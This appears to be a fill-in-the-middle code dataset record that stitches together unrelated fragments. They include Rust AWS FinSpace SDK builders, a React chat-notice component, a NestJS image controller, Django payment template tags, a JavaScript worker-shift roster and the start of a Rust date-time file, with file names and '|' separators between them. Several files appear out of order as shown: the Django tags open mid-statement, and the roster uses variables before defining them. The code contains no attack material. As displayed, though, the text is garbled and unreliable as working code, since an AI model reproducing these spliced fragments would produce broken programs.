/// <li> <p> <code>arn:aws:finspace:${Region}::data-bundle/taq</code> (default) - Contains trades and quotes data in addition to sample Capital Markets data.</p> </li>
/// </ul>
pub fn data_bundles(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.data_bundles(input.into());
self
}
/// <p>The list of Amazon Resource Names (ARN) of the data bundles to install. Currently supported data bundle ARNs:</p>
/// <ul>
/// <li> <p> <code>arn:aws:finspace:${Region}::data-bundle/capital-markets-sample</code> - Contains sample Capital Markets datasets, categories and controlled vocabularies.</p> </li>
/// <li> <p> <code>arn:aws:finspace:${Region}::data-bundle/taq</code> (default) - Contains trades and quotes data in addition to sample Capital Markets data.</p> </li>
/// </ul>
pub fn set_data_bundles(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.inner = self.inner.set_data_bundles(input);
self
}
}
/// Fluent builder constructing a request to `DeleteEnvironment`.
///
/// <p>Delete an FinSpace environment.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct DeleteEnvironment {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::delete_environment_input::Builder,
}
impl DeleteEnvironment {
/// Creates a new `DeleteEnvironment`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::DeleteEnvironmentOutput,
aws_smithy_http::result::SdkError<crate::error::DeleteEnvironmentError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>The identifier for the FinSpace environment.</p>
pub fn environment_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.environment_id(input.into());
self
}
/// <p>The identifier for the FinSpace environment.</p>
pub fn set_environment_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_environment_id(input);
self
}
}
/// Fluent builder constructing a request to `GetEnvironment`.
///
/// <p>Returns the FinSpace environment object.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct GetEnvironment {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::get_environment_input::Builder,
}
impl GetEnvironment {
/// Creates a new `GetEnvironment`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::GetEnvironmentOutput,
aws_smithy_http::result::SdkError<crate::error::GetEnvironmentError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>The identifier of the FinSpace environment.</p>
pub fn environment_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.environment_id(input.into());
self
}
/// <p>The identifier of the FinSpace environment.</p>
pub fn set_environment_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_environment_id(input);
self
}
}
/// Fluent builder constructing a request to `ListEnvironments`.
///
/// <p>A list of all of your FinSpace environments.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ListEnvironments {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::list_environments_input::Builder,
}
impl ListEnvironments {
/// Creates a new `ListEnvironments`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ListEnvironmentsOutput,
aws_smithy_http::result::SdkError<crate::error::ListEnvironmentsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>A token generated by FinSpace that specifies where to continue pagination if a previous request was truncated. To get the next set of pages, pass in the nextToken value from the response object of the previous page call.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.next_token(input.into());
self
}
/// <p>A token generated by FinSpace that specifies where to continue pagination if a previous request was truncated. To get the next set of pages, pass in the nextToken value from the response object of the previous page call.</p>
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_next_token(input);
self
}
/// <p>The maximum number of results to return in this request.</p>
pub fn max_results(mut self, input: i32) -> Self {
self.inner = self.inner.max_results(input);
self
}
/// <p>The maximum number of results to return in this request.</p>
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_max_results(input);
self
}
}
/// Fluent builder constructing a request to `ListTagsForResource`.
///
/// <p>A list of all tags for a resource.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ListTagsForResource {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::list_tags_for_resource_input::Builder,
}
impl ListTagsForResource {
/// Creates a new `ListTagsForResource`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ListTagsForResourceOutput,
aws_smithy_http::result::SdkError<crate::error::ListTagsForResourceError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>The Amazon Resource Name of the resource.</p>
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.resource_arn(input.into());
self
}
/// <p>The Amazon Resource Name of the resource.</p>
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_resource_arn(input);
self
}
}
/// Fluent builder constructing a request to `TagResource`.
///
/// <p>Adds metadata tags to a FinSpace resource.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct TagResource {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::tag_resource_input::Builder,
}
impl TagResource {
/// Creates a new `TagResource`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::TagResourceOutput,
aws_smithy_http::result::SdkError<crate::error::TagResourceError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>The Amazon Resource Name (ARN) for the resource.</p>
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.resource_arn(input.into());
self
}
/// <p>The Amazon Resource Name (ARN) for the resource.</p>
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_resource_arn(input);
self
}
/// Adds a key-value pair to `tags`.
///
/// To override the contents of this collection use [`set_tags`](Self::set_tags).
///
/// <p>One or more tags to be assigned to the resource.</p>
pub fn tags(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
self.inner = self.inner.tags(k.into(), v.into());
self
}
/// <p>One or more tags to be assigned to the resource.</p>
pub fn set_tags(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.inner = self.inner.set_tags(input);
self
}
}
/// Fluent builder constructing a request to `UntagResource`.
///
/// <p>Removes metadata tags from a FinSpace resource.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct UntagResource {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::untag_resource_input::Builder,
}
impl UntagResource {
/// Creates a new `UntagResource`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::UntagResourceOutput,
aws_smithy_http::result::SdkError<crate::error::UntagResourceError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>A FinSpace resource from which you want to remove a tag or tags. The value for this parameter is an Amazon Resource Name (ARN).</p>
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.resource_arn(input.into());
self
}
/// <p>A FinSpace resource from which you want to remove a tag or tags. The value for this parameter is an Amazon Resource Name (ARN).</p>
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_resource_arn(input);
self
}
/// Appends an item to `tagKeys`.
///
/// To override the contents of this collection use [`set_tag_keys`](Self::set_tag_keys).
///
/// <p>The tag keys (names) of one or more tags to be removed.</p>
pub fn tag_keys(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.tag_keys(input.into());
self
}
/// <p>The tag keys (names) of one or more tags to be removed.</p>
pub fn set_tag_keys(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.inner = self.inner.set_tag_keys(input);
self
}
}
/// Fluent builder constructing a request to `UpdateEnvironment`.
///
/// <p>Update your FinSpace environment.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct UpdateEnvironment {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::update_environment_input::Builder,
}
impl UpdateEnvironment {
/// Creates a new `UpdateEnvironment`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::UpdateEnvironmentOutput,
aws_smithy_http::result::SdkError<crate::error::UpdateEnvironmentError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>The identifier of the FinSpace environment.</p>
pub fn environment_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.environment_id(input.into());
self
}
/// <p>The identifier of the FinSpace environment.</p>
pub fn set_environment_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_environment_id(input);
self
}
/// <p>The name of the environment.</p>
pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.name(input.into());
self
}
/// <p>The name of the environment.</p>
pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_name(input);
self
}
/// <p>The description of the environment.</p>
pub fn description(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.description(input.into());
self
}
/// <p>The description of the environment.</p>
pub fn set_description(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_description(input);
self
}
/// <p>Authentication mode for the environment.</p>
/// <ul>
/// <li> <p> <code>FEDERATED</code> - Users access FinSpace through Single Sign On (SSO) via your Identity provider.</p> </li>
/// <li> <p> <code>LOCAL</code> - Users access FinSpace via email and password managed within the FinSpace environment.</p> </li>
/// </ul>
pub fn federation_mode(mut self, input: crate::model::FederationMode) -> Self {
self.inner = self.inner.federation_mode(input);
self
}
/// <p>Authentication mode for the environment.</p>
/// <ul>
/// <li> <p> <code>FEDERATED</code> - Users access FinSpace through Single Sign On (SSO) via your Identity provider.</p> </li>
/// <li> <p> <code>LOCAL</code> - Users access FinSpace via email and password managed within the FinSpace environment.</p> </li>
/// </ul>
pub fn set_federation_mode(
mut self,
input: std::option::Option<crate::model::FederationMode>,
) -> Self {
self.inner = self.inner.set_federation_mode(input);
self
}
/// <p>Configuration information when authentication mode is FEDERATED.</p>
pub fn federation_parameters(mut self, input: crate::model::FederationParameters) -> Self {
self.inner = self.inner.federation_parameters(input);
self
}
/// <p>Configuration information when authentication mode is FEDERATED.</p>
pub fn set_federation_parameters(
mut self,
input: std::option::Option<crate::model::FederationParameters>,
) -> Self {
self.inner = self.inner.set_federation_parameters(input);
self
}
}
}
impl Client {
/// Creates a client with the given service config and connector override.
pub fn from_conf_conn<C, E>(conf: crate::Config, conn: C) -> Self
where
C: aws_smithy_client::bounds::SmithyConnector<Error = E> + Send + 'static,
E: Into<aws_smithy_http::result::ConnectorError>,
{
let retry_config = conf.retry_config.as_ref().cloned().unwrap_or_default();
let timeout_config = conf.timeout_config.as_ref().cloned().unwrap_or_default();
let sleep_impl = conf.sleep_impl.clone();
let mut builder = aws_smithy_client::Builder::new()
.connector(aws_smithy_client::erase::DynConnector::new(conn))
.middleware(aws_smithy_client::erase::DynMiddleware::new(
crate::middleware::DefaultMiddleware::new(),
));
builder.set_retry_config(retry_config.into());
builder.set_timeout_config(timeout_config);
if let Some(sleep_impl) = sleep_impl {
builder.set_sleep_impl(Some(sleep_impl));
}
let client = builder.build();
Self {
handle: std::sync::Arc::new(Handle { client, conf }),
}
}
/// Creates a new client from a shared config.
#[cfg(any(feature = "rustls", feature = "native-tls"))]
pub fn new(sdk_config: &aws_types::sdk_config::SdkConfig) -> Self {
Self::from_conf(sdk_config.into())
}
/// Creates a new client from the service [`Config`](crate::Config).
#[cfg(any(feature = "rustls", feature = "native-tls"))]
pub fn from_conf(conf: crate::Config) -> Self {
let retry_config = conf.retry_config.as_ref().cloned().unwrap_or_default();
let timeout_config = conf.timeout_config.as_ref().cloned().unwrap_or_default();
let sleep_impl = conf.sleep_impl.clone();
let mut builder = aws_smithy_client::Builder::dyn_https().middleware(
aws_smithy_client::erase::DynMiddleware::new(
crate::middleware::DefaultMiddleware::new(),
),
);
builder.set_retry_config(retry_config.into());
builder.set_timeout_config(timeout_config);
// the builder maintains a try-state. To avoid suppressing the warning when sleep is unset,
// only set it if we actually have a sleep impl.
if let Some(sleep_impl) = sleep_impl {
builder.set_sleep_impl(Some(sleep_impl));
}
let client = builder.build();
Self {
handle: std::sync::Arc::new(Handle { client, conf }),
}
}
}
|
with_config
|
index.js
|
// @flow
import * as React from 'react'
import {Box, Text, ConnectedUsernames, Icon, TimelineMarker} from '../../../../common-adapters'
import {EmojiIfExists} from '../../../../common-adapters/markdown.shared'
import UserNotice from '../../notices/user-notice'
import {globalStyles, globalColors, globalMargins} from '../../../../styles'
import {formatTimeForMessages} from '../../../../util/timestamp'
import {isAndroid, isMobile} from '../../../../constants/platform'
import type {
SystemMessage,
AddedToTeamInfo,
SimpleToComplexTeamInfo,
InviteAcceptedInfo,
GitPushInfo,
} from '../../../../constants/types/chat'
const connectedUsernamesProps = {
clickable: true,
inline: true,
colorFollowing: true,
type: 'BodySmallSemibold',
underline: true,
}
type Props = {
admin: boolean,
channelname: string,
isBigTeam: boolean,
message: SystemMessage,
onClickUserAvatar: (username: string) => void,
onManageChannels: (teamname: string) => void,
onViewTeam: (teamname: string) => void,
onViewGitRepo: (repoID: string, teamname: string) => void,
teamname: string,
you: string,
}
type AddedToTeamProps = Props & {info: AddedToTeamInfo}
const AddedToTeamNotice = ({
admin,
channelname,
isBigTeam,
message,
info,
onClickUserAvatar,
onManageChannels,
onViewTeam,
you,
}: AddedToTeamProps) => {
const {adder, addee, team} = info
const adderComponent =
adder === you ? 'You' : <ConnectedUsernames {...connectedUsernamesProps} usernames={[adder]} />
const selfAddee = adder === you ? 'yourself' : 'you'
const addeeComponent =
addee === you ? selfAddee : <ConnectedUsernames {...connectedUsernamesProps} usernames={[addee]} />
let manageComponent = null
if (addee === you && isBigTeam) {
manageComponent = (
<Text
onClick={() => onManageChannels(team)}
type="BodySmallSemiboldInlineLink"
style={{color: globalColors.blue}}
>
Manage your channel subscriptions
</Text>
)
} else if (admin) {
manageComponent = (
<Text
onClick={() => onViewTeam(team)}
type="BodySmallSemiboldInlineLink"
style={{color: globalColors.blue}}
>
Manage members
</Text>
)
} else {
manageComponent = (
<Text
onClick={() => onViewTeam(team)}
type="BodySmallSemiboldInlineLink"
style={{color: globalColors.blue}}
>
See all members
</Text>
)
}
return (
<UserNotice
style={{marginTop: globalMargins.small}}
username={you !== addee ? addee : undefined}
teamname={you === addee ? team : undefined}
onClickAvatar={you !== addee ? () => onClickUserAvatar(addee) : () => onViewTeam(team)}
bgColor={globalColors.blue4}
>
{you === addee && (
<Icon type="icon-team-sparkles-48-40" style={{marginTop: -36, width: 48, height: 40}} />
)}
<Text type="BodySmallSemibold" backgroundMode="Announcements" style={{color: globalColors.black_40}}>
{formatTimeForMessages(message.timestamp)}
</Text>
<Box style={{...globalStyles.flexBoxColumn, alignItems: 'center'}}>
<Text
type="BodySmallSemibold"
backgroundMode="Announcements"
style={{color: globalColors.black_40, textAlign: 'center'}}
>
{adderComponent} added {addeeComponent} to{' '}
<Text type="BodySmallSemibold" style={{color: globalColors.black_60}}>
{team}
</Text>
.{' '}
{you === addee && (
<Text type="BodySmallSemibold">
Say hi!{' '}
<EmojiIfExists
style={{display: isMobile ? 'flex' : 'inline-block'}}
emojiName=":wave:"
size={14}
/>
</Text>
)}
</Text>
{manageComponent}
</Box>
</UserNotice>
)
}
type ComplexTeamProps = Props & {info: SimpleToComplexTeamInfo}
const ComplexTeamNotice = ({
channelname,
message,
info,
onManageChannels,
onViewTeam,
you,
}: ComplexTeamProps) => {
const teamname = info.team
const authorComponent =
message.author === you ? (
'You'
) : (
<ConnectedUsernames
clickable={true}
inline={true}
type="BodySmallSemibold"
colorFollowing={true}
usernames={[message.author]}
/>
)
return (
|
bgColor={globalColors.blue4}
onClickAvatar={() => onViewTeam(teamname)}
>
<Text
type="BodySmallSemibold"
backgroundMode="Announcements"
style={{color: globalColors.black_40, marginTop: globalMargins.tiny}}
>
{formatTimeForMessages(message.timestamp)}
</Text>
<Box style={globalStyles.flexBoxColumn}>
<Text type="BodySmallSemibold" style={{textAlign: 'center'}}>
{authorComponent} made {teamname} a big team!
</Text>
<Text type="BodySmallSemibold" style={{textAlign: 'center', marginTop: globalMargins.tiny}}>
Note that:
</Text>
<Box style={{...globalStyles.flexBoxColumn, marginTop: globalMargins.xtiny}}>
<Box style={{...globalStyles.flexBoxRow}}>
<Text type="BodySmallSemibold" style={{marginRight: globalMargins.tiny}}>
{'\u2022'}
</Text>
<Text type="BodySmallSemibold">
Your team channels will now appear in the "Big teams" section of the inbox.
</Text>
</Box>
<Box style={{...globalStyles.flexBoxRow, marginTop: globalMargins.tiny}}>
<Text type="BodySmallSemibold" style={{marginRight: globalMargins.tiny}}>
{'\u2022'}
</Text>
{!isAndroid && (
<Text type="BodySmallSemibold">
Notifications will no longer happen for every message. {isMobile ? 'Tap' : 'Click on'} the{' '}
<Box style={{display: isMobile ? 'flex' : 'inline-block', height: 11, width: 11}}>
<Icon type="iconfont-info" style={{fontSize: 11}} />
</Box>{' '}
to configure them.
</Text>
)}
{isAndroid && (
<Text type="BodySmallSemibold">
Notifications will no longer happen for every message. Tap the info icon in the top right to
configure them.
</Text>
)}
</Box>
<Box style={{...globalStyles.flexBoxRow, marginTop: globalMargins.tiny}}>
<Text type="BodySmallSemibold" style={{marginRight: globalMargins.tiny}}>
{'\u2022'}
</Text>
<Text type="BodySmallSemibold">
Everyone can now create and join channels.{' '}
<Text
onClick={() => onManageChannels(teamname || '')}
type="BodySmallSemiboldInlineLink"
style={{color: globalColors.blue}}
>
Manage your channel subscriptions
</Text>
</Text>
</Box>
</Box>
</Box>
</UserNotice>
)
}
type InviteAddedToTeamProps = Props & {info: InviteAcceptedInfo}
const InviteAddedToTeamNotice = ({
channelname,
message,
info,
onClickUserAvatar,
onManageChannels,
onViewTeam,
you,
}: InviteAddedToTeamProps) => {
const {team, inviter, invitee, adder, inviteType} = info
let copy
if (you === invitee) {
copy = (
<Text type="BodySmallSemibold" style={{textAlign: 'center'}}>
Welcome to{' '}
<Text type="BodySmallSemibold" style={{color: globalColors.black_60}}>
{team}
</Text>
. Say hi!{' '}
<EmojiIfExists style={{display: isMobile ? 'flex' : 'inline-block'}} emojiName=":wave:" size={14} />
</Text>
)
} else {
copy = (
<Text type="BodySmallSemibold" style={{textAlign: 'center'}}>
<ConnectedUsernames {...connectedUsernamesProps} usernames={[invitee]} /> just joined {team}.{' '}
{you === inviter ? 'You invited them' : 'They were invited by '}
{you !== inviter && <ConnectedUsernames {...connectedUsernamesProps} usernames={[inviter]} />}
{inviteType === 'seitan' ? '' : ' via ' + inviteType}
, and they were just now auto-added to the team sigchain by{' '}
{you === adder ? 'you' : <ConnectedUsernames {...connectedUsernamesProps} usernames={[adder]} />}
, the first available admin.
</Text>
)
}
return (
<UserNotice
style={{marginTop: globalMargins.small}}
username={invitee === you ? undefined : invitee}
teamname={invitee === you ? team : undefined}
bgColor={globalColors.blue4}
onClickAvatar={invitee === you ? () => onViewTeam(team) : () => onClickUserAvatar(invitee)}
>
{you === invitee && (
<Icon type="icon-team-sparkles-48-40" style={{marginTop: -36, width: 48, height: 40}} />
)}
<Text type="BodySmallSemibold" backgroundMode="Announcements" style={{color: globalColors.black_40}}>
{formatTimeForMessages(message.timestamp)}
</Text>
<Box style={{...globalStyles.flexBoxColumn, alignItems: 'center'}}>{copy}</Box>
</UserNotice>
)
}
type GitPushInfoProps = Props & {info: GitPushInfo}
const GitPushInfoNotice = ({message, info, onClickUserAvatar, onViewGitRepo}: GitPushInfoProps) => {
// There is a bug in the data layer where mergeEntities when it sees dupes of this message will keep on adding to the array
// Short term fix: clean this up
const refsMap = (info.refs || []).reduce((map, ref) => {
;(ref.commits || []).forEach(commit => {
const name = ref.refName.split('/')[2]
if (!map[name]) {
map[name] = []
}
if (!map[name].find(c => c.commitHash === commit.commitHash)) {
map[name].push(commit)
}
})
return map
}, {})
return Object.keys(refsMap).map(branchName => (
<UserNotice
username={info.pusher}
key={branchName}
style={{marginTop: globalMargins.small}}
bgColor={globalColors.blue4}
onClickAvatar={() => onClickUserAvatar(info.pusher)}
>
<Text type="BodySmallSemibold" backgroundMode="Announcements" style={{color: globalColors.black_40}}>
{formatTimeForMessages(message.timestamp)}
</Text>
<Box style={globalStyles.flexBoxColumn}>
<Text type="BodySmallSemibold" style={{textAlign: 'center', marginBottom: globalMargins.xtiny}}>
<ConnectedUsernames {...connectedUsernamesProps} usernames={[info.pusher]} /> pushed{' '}
{refsMap[branchName].length} {`commit${refsMap[branchName].length !== 1 ? 's' : ''}`} to{' '}
<Text
type="BodySmallSemibold"
style={info.repoID ? {color: globalColors.black_75} : undefined}
onClick={info.repoID ? () => onViewGitRepo(info.repoID, info.team) : undefined}
>{`${info.repo}/${branchName}`}</Text>:
</Text>
<Box style={globalStyles.flexBoxColumn}>
{refsMap[branchName].map((commit, i) => (
<Box style={globalStyles.flexBoxRow} key={commit.commitHash}>
<TimelineMarker
idx={i}
max={refsMap[branchName].length - 1}
style={{marginRight: globalMargins.xtiny, ...(isMobile ? {marginTop: -3} : null)}}
/>
<Box style={{...globalStyles.flexBoxRow, flex: 1, alignItems: 'flex-start'}}>
<Box
style={{
display: 'flex',
backgroundColor: globalColors.blue3_20,
padding: 2,
borderRadius: 3,
marginRight: globalMargins.xtiny,
marginBottom: 1,
height: 18,
}}
>
<Text
type="Terminal"
selectable={true}
style={{
fontSize: 11,
color: globalColors.blue,
lineHeight: isMobile ? 16 : 1.3,
}}
>
{commit.commitHash.substr(0, 8)}
</Text>
</Box>
<Box style={{display: 'flex', flex: 1}}>
<Text type="BodySmall" selectable={true} style={{textAlign: 'left'}} lineClamp={2}>
{commit.message}
</Text>
</Box>
</Box>
</Box>
))}
</Box>
</Box>
</UserNotice>
))
}
export {AddedToTeamNotice, ComplexTeamNotice, InviteAddedToTeamNotice, GitPushInfoNotice}
|
<UserNotice
style={{marginTop: globalMargins.small}}
teamname={teamname || ''}
|
image.controller.ts
|
import { Controller, Get, Post, Body, Patch, Param, Delete } from '@nestjs/common';
import { ImageService } from './image.service';
import { CreateImageDto } from './dto/create-image.dto';
import { UpdateImageDto } from './dto/update-image.dto';
|
@Controller('api/images')
export class ImageController {
constructor(private readonly imageService: ImageService) {}
@Get()
async findAll() {
return await this.imageService.findAll();
}
@Get(':id')
async findOne(@Param('id') id: string) {
return await this.imageService.findOne(id);
}
@Patch(':id')
async update(@Param('id') id: string, @Body() updateImageDto: UpdateImageDto) {
return await this.imageService.update(id, updateImageDto);
}
@Delete(':id')
async remove(@Param('id') id: string) {
return await this.imageService.remove(id);
}
@Delete()
async removeAll() {
return await this.imageService.removeAll();
}
}
| |
payments_tags.py
|
from django import template
from ..forms import PlanForm
register = template.Library()
|
"form": PlanForm(initial={
"plan": context["request"].user.customer.current_subscription.plan
})
})
return context
@register.inclusion_tag("drfstripe/_subscribe_form.html", takes_context=True)
def subscribe_form(context):
context.update({
"form": PlanForm()
})
return context
|
@register.inclusion_tag("drfstripe/_change_plan_form.html", takes_context=True)
def change_plan_form(context):
context.update({
|
workers.consts.js
|
const bar = {id: 1, firstName: 'Bar', lastName: 'Ashual', gender: 'm', constraints: [1,2,3], shiftsAMonth: 6, preferNot:[], isSenior: 1, shabats: 1};
const omerD = {id: 2, firstName: 'Omer', lastName: 'Dital', gender: 'm', constraints: [4,5,6], shiftsAMonth: 5, preferNot:[], isSenior: 1, shabats: 1};
|
const lior = {id: 5, firstName: 'Lior', lastName: 'tooba', gender: 'f', constraints: [5,7], shiftsAMonth: 1, preferNot:[], isSenior: 1, shabats: 0};
const or = {id: 6, firstName: 'Or', lastName: 'Gibor', gender: 'f', constraints: [6,7], shiftsAMonth: 2, preferNot:[],isSenior: 0, shabats: 0};
const noga = {id: 7, firstName: 'Noga', lastName: 'Lavan', gender: 'f', shiftsAMonth: 5, constraints: [], preferNot:[], isSenior: 0, shabats: 1};
const inbal = {id: 8, firstName: 'Inbal', lastName: 'Avraham', gender: 'f', shiftsAMonth: 4, constraints: [], preferNot:[], isSenior:0 ,shabats: 0};
const ori = {id: 9, firstName: 'Ori', lastName: 'Hoogi', gender: 'm', shiftsAMonth: 2, constraints: [30,21,24], preferNot:[], isSenior: 1, shabats: 0};
const tal = {id: 10, firstName: 'Tal', lastName: 'Mikey', gender: 'm', shiftsAMonth: 3, constraints: [27,28,29,1,2,3,4,5], preferNot:[], isSenior: 1, shabats: 0};
const ido = {id: 11, firstName: 'Ido', lastName: 'Perach', gender: 'm', shiftsAMonth: 1, constraints: [], preferNot:[], isSenior: 0, shabats: 1};
const daniel = {id: 12, firstName: 'Daniel', lastName: 'Moyal', gender: 'f', shiftsAMonth: 0, constraints: [], preferNot:[], isSenior: 0, shabats: 0};
const sharon = {id: 13, firstName: 'Sharon', lastName: 'Grossman', gender: 'm', shiftsAMonth: 1, constraints: [], preferNot:[], isSenior: 1, shabats: 0};
const omerB = {id: 14, firstName: 'Omer', lastName: 'Bahari', gender: 'm', shiftsAMonth: 0, constraints: [], preferNot:[], isSenior: 1, shabats: 0};
export const workers = [bar, omerD, ofek, hen, lior, or, noga, inbal, ori, tal, ido, daniel, sharon, omerB];
|
const ofek = {id: 3, firstName: 'Ofek', lastName: 'Israel', gender: 'm', constraints: [1,3,4], shiftsAMonth: 5, preferNot:[], isSenior: 0, shabats: 0};
const hen = {id: 4, firstName: 'Hen', lastName: 'Sinai', gender: 'm', constraints: [], shiftsAMonth: 2, preferNot:[], isSenior: 1, shabats: 0};
|
primitive_date_time.rs
|
use crate::{
error, format_description::FormatDescription, hack, util, Date, Duration, OffsetDateTime, Time,
UtcOffset, Weekday,
};
#[cfg(feature = "alloc")]
use alloc::string::String;
use const_fn::const_fn;
use core::{
fmt,
ops::{Add, AddAssign, Sub, SubAssign},
time::Duration as StdDuration,
};
/// Combined date and time.
